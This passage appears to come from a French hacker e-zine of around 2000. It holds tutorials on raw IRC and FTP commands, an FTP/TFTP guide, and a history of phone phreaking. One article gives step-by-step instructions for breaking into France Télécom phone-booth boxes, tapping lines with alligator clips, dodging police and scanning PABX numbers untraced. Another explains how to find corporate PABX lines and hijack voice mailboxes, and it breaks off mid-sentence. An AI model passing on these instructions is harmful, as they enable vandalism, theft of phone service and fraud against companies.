:Caen.Fr.Eu.UnderNet.org 372 telnet_user :Type /MOTD to read the AUP before continuing
 using this service.
:Caen.Fr.Eu.UnderNet.org 372 telnet_user :The message of the day was last changed: 12/
6/2000
:Caen.Fr.Eu.UnderNet.org 376 telnet_user :End of /MOTD command.
:Caen.Fr.Eu.UnderNet.org NOTICE telnet_user :on 1 ca 1(2) ft 10(10) tr

// Vous voila donc logger dans le reseau de caen.fr.eu.undernet.org , maintenant passons au commandes.


II) Les commandes irc: (non exhaustif)
Les commandes irc ne sont pas les memes que celles employes dans les logiciels, vous
n'avez pas a tape de / devant votre commande et vous n'avez pas non plus de boutons qui
automatisent les taches.


nick surnom 
// Permet de changez votre surnom actuelle

join #Nom_de_la_channel 
// Permet de se connecter a une channel sur le 
// reseau.

who surnom_de_l_utilisateur_souhaite 
// Permet d'avoie des informations sur 
// l'utilisateur (channels auquel il est connect, nom de host)

whois surnom_de_l_utilisateur_souhaite 
// Permet d'avoir un peu plus 
// d'infos sur l'utilisateur que la commande who entre autre le serveur par 
// lequel il est connecter au reseau irc.

whowas surnom_de_l_utilisateur_souhaite 
// Permet d'avoir des informations
// sur surnom_de_l_utilisateur_souhaite qui n'est plus dans la channel.

MSGPRIV surnom ou #nom_de_la_channel : Message 
// Permet d'ecrire a un 
// utilisateur en priv ou d'ecrire sur une channel

D'abord, les commandes qui s'appliquent aux utilisateurs:

Ping surnom_de_l_utilisateur_souhaite 
// Permet d'envoyer un ping  
// l'utilisateur souhait pour connaitre sont temps de rponse. (Si on 
// vous envoit un ping, envoyez un pong, ce n'aura rien  voir avec le 
// temps de connexion mais avec le temps que vous mettrez  renvoyer le 
// pong ;)

mode #nom_de_la_channel +commande +surnom_de_l_utilisateur_souhaite 
//Il existe differents type de commandes, ces commandes permettent en general 
// de modifi les droits et privileges des utilisateurs connect a une 
// channel. il faut generalement etre op sur cette channel pour pouvoir 
// effectuer ces commandes.

La commande o 
// Si vous rentrez la commande +o alors l'utilisateur 
// deviendra op sur la channel defini. Il aura tous les privilege. Si a 
// l'inverse vous rentrez la commandes -o, celui-ci perdra tous ses 
// privilege et deviendra un utilisateur de base. Il faut etre soi-meme op 
// pour utiliser cette commande.

La commande v 
// Si vous rentrez la commande +v alors l'utilisateur 
// deviendra voic (il aura le droit a la parole) sur la channel defini. 
// Cette commande n'est utile que si la channel n'autorise pas les 
// utilisateur de base a parler. Si a l'inverse vous rentrez la commandes -v, 
// celui-ci perdra son voice et deviendra un utilisateur de base. Il 
// faut etre soi-meme op pour utiliser cette commande.

La commande i 
// Celle-ci invite l'utilisateur a se joindre a une channel. 
// Ex: la channel est invisible, on invite l'utilisateur, l'acces est 
// restreint pour les autres.

Les commandes qui s'appliquent a une channel:

La commande l 
// La commande l +nombre limite la channel a nombre 
// utilisateur. Pour suppimer cette restriction -l .Il faut etre op pour 
// utiliser cette commande.

La commande t 
// Seul l(s)'operatuer peut changer le titre duc canal +t et 
// pour supprimer cette interdiction -t .

La commande m 
// Seul les operateurs et les voic (+v) peuvent parler sur 
// la channel avec +m , pour supprimer cette interdiction, -m .


III) Les differents serveurs IRC:

Il existe plusieurs type de serveurs (beaucoup) mais je vais vous en donner une liste des principaux:
Cette liste ne concernera uniquement les serveurs Undernet et IrcNet.
La connection se fait pour toute au port 6667.

Undernet                        Caen.Fr.Eu.UnderNet.org
Undernet                        Paris.Fr.Eu.UnderNet.org
Undernet                        toronto.on.ca.undernet.org
Undernet                        montreal.qu.ca.undernet.org
Undernet                        channels.undernet.org
Undernet                        Antwerpen.Be.Eu.Undernet.org
Undernet                        Goettingen.DE.EU.undernet.org
Undernet                        Regensburg.DE.EU.undernet.org
Undernet                        Sevilla.ES.EU.UnderNet.org
Undernet                        Diemen.NL.EU.undernet.org
Undernet                        Leiden.nl.eu.undernet.org
Undernet                        Oslo-R.NO.EU.Undernet.org
Undernet                        Oslo1.NO.EU.Undernet.org
Undernet                        lulea-r.se.eu.undernet.org
Undernet                        London.UK.eu.Undernet.org
Undernet                        auckland.nz.undernet.org
Undernet                        protocol.undernet.org
Undernet                        phoenix.az.us.undernet.org


IRCNet                          sil.polytechnique.fr
IRCNet                          irc.wu-wien.ac.at
IRCNet                          flute.telstra.net.au
IRCNet                          ircd.belnet.be
IRCNet                          irc.openface.ca
IRCNet                          irc.span.ch
IRCNet                          irc.aimnet.com
IRCNet                          irc.anet-chi.com
IRCNet                          ircnet.irc.aol.com
IRCNet                          chat.btinternet.com
IRCNet                          irc.insat.com
IRCNet                          ircnet.sprynet.com
IRCNet                          irc.u-net.com
IRCNet                          irc.felk.cvut.cz
IRCNet                          irc.gmd.de
IRCNet                          sunsite.auc.dk
IRCNet                          irc.dknet.dk
IRCNet                          irc.ut.ee

Conclusion:

J'espere que cette articles vous aura aider a comprendre un partie du 
protocole irc et de savoir la maniere don interprete votre logiciel irc 
lorsque vous cliquez sur un bouton. Il est certain que je n'ai pas decrite 
toute les commandes Irc, c'est un travail trop long et sans interet, si 
vous desirez reelement en apprendre plus alors lisez le RFC 1459 (qui
date de 1993) et ses ameliorations dans les RFC 2810, 2811, 2812, 2813, 
ou encore des articles specialiss... Si vous souhaitez m'envoyer vos 
commentaires sur cette article, vous pouvez le faire par mon mail: sKoop@programmer.net
Bon chat


,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.



                               ////////////////////////////////////////////                                                                         
                               // 9 //////////////////////////////////////                                                                       
                               ///////////Telnet: FTP (Le NB how-to)/////
                               /////////////////////////////////////////
                               /////////////////////////////par sKoop//


Intro:

Apres avoir dj crit un article sur l'irc, je me suis demand pourquoi ne pas 
aussi en crire un sur le ftp, lorsque l'on se connecte a internet, c'est aussi 
pour tlcharger de nouveaux logiciels ou autres informations, un protocole trs 
bien implement dans le transfert de fichier est le FTP (File Transfer Protocole). 
Pourquoi par telnet? et bien une fois de plus pour  mieux comprendre ce qu'est le
protocole, et pour pouvoir faire du Ftp par n'importe quelle machine.


I) Compte et Mot de Passe:

Il y a 2 types de comptes, le compte anonymous qui ne ncessite comme mot de passe 
que votre adresse e-mail, et les comptes comportant un nom/mot_de_passe. Nous 
tudierons ici les connexions avec un compte anonymous cela dit la mthode ne 
change pas, seul les droits sur le serveur par la suite changent.


II) Connexion a un serveur FTP:

Il va donc falloir ouvrir une session telnet.Dans le cas present, je dispose 
d'un compte anonymous et mon mot de passe est mrspok@test.com. Le serveur est 
987.654.321.0 et le port me permettant d'accder au serveur est le port 21 
(Le port varie selon le choix de l'administrateur ftp mais cela reste gnralement 
le port 21). Le signe  > dsigne que la commande doit tre rentre par vous et < 
qu'elle est envoye par le serveur. Pour cela rentrer la commande:
// telnet ip_du_serveur port_du_serveur donc dans notre cas, cela donne:

> telnet 987.654.321.0 21

// Si tout fonctionne correctement, le serveur vous renvoie des informations
//  son sujet (peut-etre de plusieurs lignes)

< 220 Bienvenue ...
< 220 ... ...

//A vous de rentrer un nom d'utilisateur (le notre est donc anonymous):

> User anonymous

// Dans le cadre d'un nom/mot_de_passe, meme si le nom est faux il 
// demandera quand meme le mot_de_passe et renverra "Mauvais mot de passe".
// cela pour tromper les ptit lamers qui croient avoir trouv un n_
// de compte valide ;) Le serveur renvoi alors la demande du mot de passe 
// de l'utilisateur concern:

< 331 Envoyer votre email comme mot de passe.

> PASS mrspok@test.com

// Pour les comptes anonymous, l'opration devrait  coup sur avoir 
// reussie. Le serveur peut alors vous renvoyer d'autres informations sur le 
// serveur FTP par le biais du n_ 230:

< 230 L'heure locale est ... Il y a 14 connects dans votre classe ...
< 230 ... ...
// il vous renvoi generalement le repertoire dans lequel vous vous trouvez
// par 257

< 257 Le repertoire courant est "/"


Voila, vous etes connectez au serveur.


III) Liste des commaneds FTP:


ACCOUNT (ACCT) // Parfois certains serveurs necessitent de specifier un login specifi  un compte.

CHANGE WORKING DIRECTORY (CWD) // Permet de changer le rpertoire courant.

REINITIALIZE (REIN) // Cela permet de stopper une session d'un utilisateur afin de pouvoir se relogg sous un autre nom.

LOGOUT (QUIT) // Termine la session.

!!! Note !!! Tous les parametre de transfert Ftp ont des valeurs par defaut, utiliser les commandes ci-dessous modifiera ces valeurs.

LIST (LIST) // Renvoi la liste du repertoire courant

TRANSFER MODE (MODE) // MODE est le mode de transfert (par defaut flux) peut-etre changer (B Bloc, C Compress, S Flux)

RETRIEVE (RETR) // transmet une copie d'un fichier selectionn vers USER-DTP (moi) Il faut specifier le type.

RENAME FROM (RNFR) // Cela montre l'adresse d'un fichier qui doit etre renomm sur le serveur puis utiliser la commande suivante.

RENAME TO (RNTO) // indique le nouveau nom souhait
 
ABORT (ABOR) // cela stop la derniere commande FTP effectu. (Ne permet pas de revenir
en arrierre sur une action passe, l'action doit etre en cours)

DELETE (DELE) // Supprime le fichier specifi.

REMOVE DIRECTORY (RMD) // Supprime un repertoire
 
MAKE DIRECTORY (MKD) // Creer un repertoire

PRINT WORKING DIRECTORY (PWD) // Imprime un repertoire

PASSIVE (PASV) // Cette commande renvoi au serveur de ne faire que un (listen) sur des ports donnes.

HELP (HELP) // demande de l'aide sur un sujet particulier au serveur

Exemple d'un transfert de fichier:

> RETRIEVE ASCII (chemin du serveur) // on prends ici un fichier de type ASCII
> STOR ASCII (chemin du DD locale) // on le ramene a la maison.

Conclusion:

J'apprends le protocole FTP depuis peu donc si certaines informations vous semblent 
incorrect veuillez m'en faire part. Ne vous bas pas sur mon article si vous dsirez 
rellement apprendre le protocole FTP. Recherchez le sur Internet: RFC 959
Si vous avez des suggestions/commentaires, veuillez m'envoyer un mail a:
sKoop@programmer.net
Bon transfert...


,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.


      *********************************************************************
	* 10 											  *
	*             Le FTP et le TFTP				              *
	*      										  *
	*			                                par N0s-k         *
	*								                    *
	*********************************************************************




1. Le FTP
---------

A. Dfinition
-------------

FTP est  la fois un protocole et un utilitaire TCP/IP permettant de transfrer des fichiers 
(binaires ou texte) entre la machine local et un ordinateur distant (qui doit bine sur disposer 
d'un serveur FTP ;)

Il peut fonctionner selon deux modes :
- Interactif
- Ligne de commande

B. Mode Interactif.
------------------

En mode interactif, l'utilisateur tablit la connexion puis frappe les commandes lui-meme au fur 
et a mesure des besoins ;)

Cette commande lance FTP et lui indique  quelle machine du rseau il doit effectuer la requete :

ftp [options] host
        
	  -d  Affiche les infos de deboggage
        -v  Supresion du mode 'bavard' (verbose)
        -g  interdit l'usage de caractre gnrique lors de          		
		transferts de multiple fichier
        -i  utilisation non interactive: pas de prompt

Host reprsente la machine distante, soit son IP soit son equivalent 
=>www.microsoft.com par exemple ;)

Ensuite il suffit de taper les commandes ;)

-------------------------------------------------------------------------
! cmd_shell     Execution d'une commande shell locale.
-------------------------------------------------------------------------
Ascii           Transfert en Ascii
-------------------------------------------------------------------------
bell            Bip Sonore en fin de chaque transfert reussi
-------------------------------------------------------------------------
binary          Transfert de fichier binaire
-------------------------------------------------------------------------
bye             Fin de session FTP, retour au schell
-------------------------------------------------------------------------
cd              Changement de repertoire sur la machine distante
-------------------------------------------------------------------------
close           Termine la connextion avec le serveur FTP sans fermer 
		    FTP
-------------------------------------------------------------------------
debug           Mise en marche du debugger
-------------------------------------------------------------------------
delete          Effacement de fichier sur la machine distante
-------------------------------------------------------------------------
dir chemin      Affichage du catalogue sur la machine distante
-------------------------------------------------------------------------
get nom_fichier Copie d'un fichier distant sur la machine locale
-------------------------------------------------------------------------
help            Accs a l'aide de FTP
-------------------------------------------------------------------------
lcd local_Dir   Changement de repertoire sur la machine locale
-------------------------------------------------------------------------
ls              Affichage du catalogue de la machine distante
-------------------------------------------------------------------------
mdelete files   Suppressions de plusieurs fichiers
-------------------------------------------------------------------------
mdir            Pareil que dir, sauf qu'on peut mettre plusieurs Rep 		    
	  	    en meme temps
-------------------------------------------------------------------------
mget            Transfert de multiple fichiers
-------------------------------------------------------------------------
mkdir	          Creation de repertoire sur la machine distante
-------------------------------------------------------------------------
mls 		    Comme ls mais on peut mettre plusieurs noms de 		          
		    fichier ;)
-------------------------------------------------------------------------
open            Ouverture d'une session FTP
-------------------------------------------------------------------------
put		    Copie d'un fichier de la machine locale vers la 			    
		    machine distante
-------------------------------------------------------------------------
pwd		    Affichage du rep courant sur la machine distante
-------------------------------------------------------------------------
quit		    Fin de session FTP, retour au schell
-------------------------------------------------------------------------
quote		    Transmet des commandes a la machine distante sans 	 	    
		    l'interpreteur local
-------------------------------------------------------------------------
remotehelp 	    Demande d'aide pour connaitre les commandes supports 		    
		    par l'hote distant
-------------------------------------------------------------------------
rmdir.dir_name  Surppime un repertoire sur la machine distante
-------------------------------------------------------------------------
send		    Synonyme de put
-------------------------------------------------------------------------
status	    Affiche l'etat de courant de FTP
-------------------------------------------------------------------------
user username   Permet de s'identifier par rapport au serveur FTP de 
		   la machine distante, un mot de passe est quasiment 		    
		    tout le temps exig ;))
-------------------------------------------------------------------------

Val c'est a peu prs tout au nivo de ce mode, qui est le plus utilis :)


C. Mode Batch

-------------

En mode batch, l'ensemble des paramtres sera fournit  FTP sur la ligne de commande de 
l'interpreteur et via un script a executer

La commande sera alors lanc de la manire suivante :

ftp -n -s:scriptftp

ou scriptftp est le nom du fichier contenant les instructions a excuter.

Celui ci pourra ressembler a celui l :

-------------------------
open www.microsoft.com
user billou fric
cd /
cd tmp
put win.zip
close
bye
-------------------------

Ce mode est donc plein d'avantage, il permet de faire des choses habituelles sans se 
faire chier a tout retaper, par exemple telecharger tout le contenu d'un repertoire mis 
a jour tous les jours.... enfin il y a plein d'utilisation ;)

2. Le TFTP
----------

Version alleg de FTP, le Trivial FTP est un protocole et une commande simplifi de transfert de 
fichier entre deux machine. Il s'appui sur UDP et ne procde pas a l'identification des 
utilisateurs... :)

TFTP [-i] hote_ip GET | PUT fichier source [destination]

	-i 		Transfert de fichier Binaire
	Hote_Ip 	Machine source
	get 		Permet de recevoir des fichiers depuis la machine 			
			distante.
	put		Permet d'envoyer des fichier sur la machine 				
			distante.
	

Je suppose que tout le monde a compris les avantages et inconveniant de ces deux protocoles, 
malheureusement, ne comptez pas avoir /etc/passwsd en TFTP ;) 
Meme si avant ct le cas :((





,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.


                               ////////////////////////////////////////////                                                                         
                               // 11 /////////////////////////////////////                                                                        
                               /////////Cabine Ft (Le NB How-to)/////////
                               /////////////////////////////////////////
                               /////////////////////////////par sKoop//

Intro:

J'ecrit cette article pour tous ceux qui comme moi sont interesss par 
ce qui se trouve derrire ces petites boites en ferrailles que l'on 
peut trouver dans chaque cabine telephonique ainsi que les petites boites 
en plastique situes un peu plus haut que les telephones FT dans les mtros.
Je n'ai pas phreaker assez souvent pour vous donnez rellement tous les 
conseils ncessaires ainsi que toutes les mises en garde (il n'y en aura 
jamais assez trop) mais je vais vous montrer ce qu'en quelques descentes 
on peut apprendre.

1) Outils:

Le materiel du phreaker est la plupart du temps fait maison, je vais essayer 
de vous guider le mieux que possible dans la ralisation d'un petit telephone 
adaptable sur toutes les lignes telephoniques.
Tout d'abord, il vous faut:
-un vieux telephone (le plus petit possible pourla discretion) avec au bout une prise ...
-un adaptateur ... vers ...
-2 pinces croco
-un fer a souder et de l' tain
-du scotch ou/et de la colle
-une cl de 11 (cela fonctionne dans la majorit des cabines FT sur Paris) ou bien mieux une
cl FT ou encore RATP (ce sont les mmes).

Souder un des fils du milieu de l'adaptateur au fil d'une pince croco. Souder le deuxieme
fil du milieu de l'adaptateur au fil de la deuxieme pince croco. Enrouler de scotch ou/et
alors utiliser de la colle afin que les pinces croco ne se decole pas de l'adaptateur (Dans
la cabine, si le fil du telephone n'est pas trs long alors sela risque de s'arracher).
Brancher l'embout de votre telephone dans l'adaptateur. Vous avez maintenant en possesion
un telephone a pince croco


2) Lieu:

D'abord, reperer un lieu ou il y n'y a pas de passant ou bien tres peu. Essayer de 
voir si il n'y a pas de poste de police a proximit. Verifiez si les rondes des camions 
de polices sont frquentes. Verifier que la cabine fonctionne (bien que la cabine 
pourrait etre casse tandis que la ligne fonctionnerai).


3) Cabine FT:

D'abord, il faut ouvrir la boite en mtal dans la cabine FT. A ce point plusieurs 
solutions s'offrent  vous. Soit vous sortez votre cl de 11 ou votre cl FT et vous 
l'ouvrez normalement. Soit vous sortez votre mini-pied de biche (faites en sorte 
qu'il ne soit pas trop voyant et que vous vous trouviez dans un endroit rellement 
dsert, cela risque de faire du bruit.). La cabine est ouverte!!! Maintenant vous 
vous trouvez face a plein de jolis petits interupteurs ainsi qu'en face d'une 
vingtaines de fils de toutes les couleurs. Ne vous inquietez pas, il vous faut 
prendre les fils de couleur rouge et vert ou encore blanc et vert (cependant 
j'ai rencontr une  cabine ou ces fils n'etaient pas comme a, donc j'ai du chercher et 
j'ai trouv deux fils dans leurs coin 1 gris et 1 rouge). Si ce ne sont pas les 
bonnes couleurs dans votre cabines alors cherchez bien, deux fils doivent se 
distinguer des autres et remonter vers le telephones FT. Pour voir si ce sont les 
bons fils ils va vous falloir les denuds, sortez votre petit couteau suisse et 
enlever le plastique autour des fils. Faites attention ne les coupez pas !!! Ensuite 
faites des tests, brancher vos deux pinces croco aux deux fils denuds et voyez si 
vous avez la ligne.


4) Portable (pc):

Pour brancher votre portable et avoir acces a tous les 3614,3615 et mme a 
Internet, vous devez faire les mmes branchements mais au lieu de raccorder 
le telephone, raccordez votre prise modem. A vous les scans VMB/PABX sans vous 
soucier que l'on trace votre numero de tel.

Conclusion:

Je pense qu'il faut etre rellement vigilant surtout quand on habite dans des 
grandes villes. Le risque est beaucoup plus elev que dans des bleds paums 
(la vous pouvez rellement sortir votre pied de biche). Merci a tab avec qui 
j'ai fait mes experiences. Vous pouvez me mailez a :
skoop@programmer.net
Bon phreak.


,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.



	*********************************************************************
	* 12											  *
	*                        Histoire du phreaking                      *
	*      										  *
	*			 				by Elgadir                *
	*								                    *
	*********************************************************************




	Bonjour  tous, vous avez l'immense honneur de lire mon premier article 
srieux ;-) Et mme si je n'ai pas eu beaucoup de temps pour le faire, 
j'espre que vous l'appreciez.
	Voil pour l'intro gnrale, je vais maintenant passer  ce qui nous 
interresse : le phreaking. Tout au long des numros de ce mag, je vais devoir 
vous en parler et j'essaierai de faire une sort de petite encyclopdie du 
phreaking. Aujourd'hui, vous aurez droit  l'histoire du phreaking et aux PABX 
(avec les VMB bien sur). Bon, je commence...

Avant propos : je prfre vous rappeller brivement ce qu'est le phreaking, 
c'est tout simplement le piratage du tlphone, autrement dit, le hack et 
la pntration de rseaux tlphoniques. Le mot phreaking est le diminutif de 
freak, free et phone, littralement "mordus du tlphone gratuit".




	
	Cet article ne sera pas exhaustif, mais j'ai essay de vous trouver 
le maximum d'informations l dessus, vous tes gats ;) 


1. Petite histoire du tlphone
	
	Tout d'abord, je vais vous faire un bref rsum de l'histoire du 
tlphone, cela vous rappellera que cette invention est trs ancienne, 
et on a mis quand mme beaucoup de temps  se rendre compte de "l'autre" 
utilisation que l'on poutvait en faire.
	
	L'histoire commence donc en 1876 lorsque Graham Bell dpose le brevet 
de sa nouvelle invention, le tlphone, Bell n'avait russi qu' communiquer 
entre deux pices. Il commercialisera la premire liaison tlphonique entre 
deux points un an plus tard et le rseau d'appel tlgraphique utilis  
l'poque aux Etats-Unis sera transform en un rseau tlphonique.
	
	Etant encore assez cher, le tlphone ne se dmocratisera aux 
Etats-Unis qu'au dbut de notre sicle. Et les premiers phreakers arriveront 
dans les annes 60, c'est  dire, avant la grande dmocratisation du tlphone 
en France au debut des annes 70.


2. Le phreaking

	Au dbut des annes 60, en pleine rvolution sociale amricaine, 
naissait un  mouvement technologique anti-institutions, anarchiste et 
parfois "New Age", sur fond de musique, de drogue et de reliquats dune 
contre-culture . Le phreaking nat dans ce milieu dej "underground". 
	
	On a souvent associ la naissance du phreaking  la dcouverte de 
la blue box par John Draper, alias Cap'n Crunch. La lgende dit que notre 
phreaker, tant soul par ce que lui disait un ami au tlphone, sortit un 
sifflet bleu de la bote de crales Captain Crunch qu'il tait en train de 
manger et abima les oreilles de son correspondant. Il se rendit compte plus 
tard que la conversation qui suivit, l'ami du phreaker n'ayant pas raccroch, 
ft gratuite. La blue box tait ne, et le mythe 2600 aussi, car le sifflet 
mtait sur la frquence 2600 Hz. Tone qui permettait,  cette poque l, de 
faire croire au centre tlphonique que l'on avait raccroch et l'on pouvait 
ensuite continuer  tlphoner gratuitement.
	
	Mais le phreaking existait dej depuis quelques annes au moment o 
cette aventure a eu lieu. Et John Draper tait dj un phreaker reconnu dans 
cette communaut qui commencait  se former. Le but de ces phreakers tait un 
peu le mme que celui des hackers d'aujourd'hui, mais dans un autre domaine. Ils voulaient 
connatre parfaitement le fonctionnement du systme tlphonique et  en dcouvrir 
les failles, pour leur permettre, ventuellement, d'effectuer des appels gratuits.
	
	On consacre une autre anecdote  Draper, celle ci montre bien les techniques 
et les agissements des pionniers du phreaking. Notre cher phreaker effectua un appel 
interurbain  partir d'une cabine tlphonique, et grce  ses connaissances en matire 
de rseau tlphonique, russit  appeler une cabine voisine de la sienne en faisant 
transiter son appel autour du monde. Cela montre bien le dsir de dcouverte qu'avait 
les phreakers.
	
	Pendant encore une dizaine d'annes, ce type de pratiques tait courant. 
Durant cette priode, la communaut phreaking s'organisa grce  la formation de 
groupes, la publication de mags dstins  diffuser les nouvelles informations; 
l'organisation tait, Internet en moins, la mme que celle des hackers aujourd'hui.
	
	Fin 1971, un article publi dans le magazine Esquire, "Secret of the Little 
Blue Box" fit connatre le piratage tlphonique au grand public. Et c'est  ce moment 
que les gouvernements de plusieurs tats amricains dcidrent d'instaurer des lois 
punissant ces pratiques. Cela fit du phreaking, un mouvement moins important et beaucoup 
plus cach.
	
	Le phreaking n'en tait pas mort pour autant, il devenait illgal, c'est tout. 
L'autre grande figure du hacking sera Kevin Mitnick, qui a dbut ses activits 
underground par le piratage de rseaux tlphoniques. Adolescent, il aurait pirat 
le service des renseignements (le 12) amricain, et il en aurait chang le message 
d'acceuil par : "La personne que vous recherchez est-elle blanche ou noire, monsieur? 
Car nous tenons deux rpertoires distincts." Ce n'est qu'une lgende, mais c'est toujours 
interressant. Et puis, s'il a vraiment fait cela, il faut relativiser, car,  cette 
poque les systmes de scurit taient quasiment inexistants.
	
	Mitnick, alias le Condor (il a emprunt ce pseudo au film avec Robert Redford, 
"Les trois jours du condor"), a tout de mme tait un grand phreaker. Nous sommes  
la fin des annes 70 et Mitnick, ag alors de 16 ans, rentre dans un groupe de pirates 
des tlcoms. Ce gang se runissait dans un resto  Los Angeles, et son but tait juste 
de faire de petites farces anodines grce au tlphone, mais une effraction informatique, 
moins anodine tout d'un coup, dans le relais d'une socit tlcom de Los Angeles fait 
connatre la police au gang. 
	
	Le Condor redevient libre (de son gang) et s'offre la libert de se balader dans 
le systme des tlcoms amricain pour dconnecter ses ennemis ou changer leur nom d'abonn 
en James Bond (lol :)). Il s'est attribu aussi un bon millier de numros de tlphone 
finissant par 007 (comme quoi, chacun ses gots !).
	
	Le dernier exploit en tant que phreaker de Mitnick sera un bon coup de S.E. 
(Social Engeenering) effectu avec deux amis. On est  la limite du phreaking, mais 
c'est un central tlphonique qui sera pntr par nos trois pirates. En effet, ils se rendent 
physiquement au central tlphonique COSMOS de Pacific Bell  Los Angeles. Le Computer 
System for Mainframe Operations est une base de donnes utilise par les grandes socits 
nationales pour contrler les fichiers mmoires darchives des appels, ils servent 
notamment  la facturation des consommations. Ils y trouvent une liste de mots de passe 
informatiques, des combinaisons pour certains bureau du central et des guides d'utilisation 
du COSMOS. Ils rfrencent ensuite leurs pseudos, pour pouvoir revenir plus facilement. 
Mitnick n'a alors que 17 ans et se fera arrter par la police pour cette histoire. 
Il copera de 3 mois d'hbergement dans un centre de dtntion pour la jeunesse. Les 
activits de Mitnick par la suite seront plutt considres comme du hacking pur et 
simple et non du phreaking.
	
	Il n'y aura ensuite plus de grands faits majeurs dans l'histoire du phreaking. 
Ce n'est pas pour autant qu'il n'y a plus de phreakers, mais ils se font moins connatre, 
d'autant plus que les systmes de scurit se perfectionnent au fil du temps et que le 
phreaking devient plus dur, par exemple, la blue box ne marche plus (elle n'a jamais 
march en France). Les phreakers d'aujourd'hui se consacrent essentiellement aux PABX...


                                                      Elgadir

PS : si cet article vous a intress, dites le moi par mail (elgadir@usa.net),
et j'essaierai de faire le mme (mais en plus long) pour le hacking.


,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.



	*********************************************************************
	* 13											  *
	*                        Les VMB/PABX                               *
	*      										  *
	*			 				by Elgadir                *
	*								                    *
	*********************************************************************




	Vous avez surement dj lut beaucoup d'articles l-dessus, mais 
comment peut-on commencer un mag sans en parler? Avant tout je tiens  vous 
prvenir que cet article ne sera pas complet, n'ayant pas le temps de trouver 
toute l'info dont j'ai besoin pour faire un article trs complet et actualis, 
je vous promet cela pour le prochain numro. Mais je vais quand mme parler de 
cela pour ceux qui dbutent.


1. Qu'est-ce qu'un PABX?

	Un Private Automatic Branch eXchanger est un central tlphonique 
utilis par beaucoup de grandes entreprises qui gre les appels entrants 
et sortants de cette entreprise. Le PABX permet  un employ d'appeler 
l'extrieur  partir de son bureau, en appuyant sur une touche, le 0 par exemple. 
Cette touche avertit le PABX que l'employ va appeler l'estrieur, notre employ 
peut ensuite composer son numro. Le PABX sert aussi  joindre un employ de 
l'extrieur grce  son numro de poste. Enfin, ce central donne  chaque employ 
une bote vocale.
	Ce qui devient interressant, c'est que, les PABX sont souvent accessibles 
(mais pas toujours) de l'extrieur par un numro vert, du moins, en dehors des 
heures de bureau.


2. A quoi cela peut bien servir pour le phreaker?
	
	Commme je vous l'ai dit, beaucoup de PABX sont accessibles par un numro vert, 
donc gratuit. Cela permet notamment aux employs d'accder  leur bote vocale quand 
ils ne sont pas au bureau ou encore de tlphoner gratuitement quand ils sont en 
dplacement, grce  un outdial. En gros l'employ appelle le cental par un numro 
vert, compose son code secret et peut ensuite appeler gratuitement. Le but du phreaker 
sera de dtourner ces deux utilisation officielle du PABX  son avantage. Le phreaker 
pourra donc avoir une bote vocale accessible gratuitement, et mieux, s'il trouve un 
outdial, il pourra tlphoner gratuitement. Aujourd'hui je ne vous parlerait que des 
botes vocales (je n'ai pas beaucoup de temps...).


3. Les VMB

	Vous l'avez compris les Voice Message Box sont les botes vocales utilisables par 
les employs. Pour accder  sa VMB, son propritaire doit appeler le PABX (grce au 
numro vert et en dehors des heures de bureau), ensuite il doit appuyer sur une touche 
(gnralement * ou #) pendant le message d'acceuil normal, pour dboucher sur le menu 
de la PABX. Ensuite, il donne son numro de VMB et son pass et il coute ses messages.
	Pour se faire une bote vocale gratuite, il faur procder par plusieurs tapes : 

a) Trouver un PABX
	C'est surement une des parties les plus chiantes, car il faut prendre son tlphone 
et scanner pleins de numros verts, l vous avez plusieurs mthodes.
	La plus connue, c'est de scanner comme un malade des numros faciles  retenir du 
type 0800 ABC ABC ou 0800 AB AB AB etc. Je ne trouve pas cette mthode trs pratique, 
car on scanne pendant des heures sans trouver grand chose.
	Une autre technique consiste  taper "numro vert" dans la case Activit du minitel 
(3611) d'indiquer une localit quelconque, de relever beaucoup de numros verts et de les 
essayer. J'ai essayer cette technique, mais je ne la vous conseille pas, parce que beaucoup 
de numros verts appartiennent  de petites PME qui n'ont pas de PABX, ce n'est pas comme 
a que vous trouverez beaucoup de PABX.
	La mthode que j'ai trouv, est encore plus simple, mais beaucoup plus efficace. 
Vous prenez toujours votre minitel, vous mettez toujours "numro vert" dans la case 
Activit, mais dans la case Nom/Marque, vous mettez le nom d'une grande entreprise 
(banques, voitures, informatiques, etc.), vous pouvez etre quasiment sur de trouver 
beaucoup de PABX avec cette mthode car la majorit des grandes entreprises ont un PABX.

b) Savoir si le numro scann est un PABX
	L, c'est plus simple : 
-Si c'est quelqu'un qui dcroche et vous dit "Allo", c'est pas un PABX.

-Si vous tombez sur un rpondeur, c'est peut etre un PABX. Dans ce cas l, votre 
rflexe est d'appuyer sur les touches *, #, 0, 1, 9, 0+*. Si aprs avoir appuy sur 
une de ces touches, vous tombez sur le menu du PABX qui vous propose plusieurs choses, 
comme acceder  sa bote vocale ou dposer un message, vous avez gagn.

-Si on vous demande un code confidentiel, c'est un PABX. Ce cas est assez dur  exploiter, 
car il faut trouver un bon mot de passe souvent assez long.

c) Utiliser le PABX et se faire une VMB
	Vous tes donc maintenant dans le menu gnral du PABX. Pour voir  quoi a ressemble, 
faites le 0800 010 800 et appuyez sur * pendant le message d'acceuil. Ensuite, vous avez en 
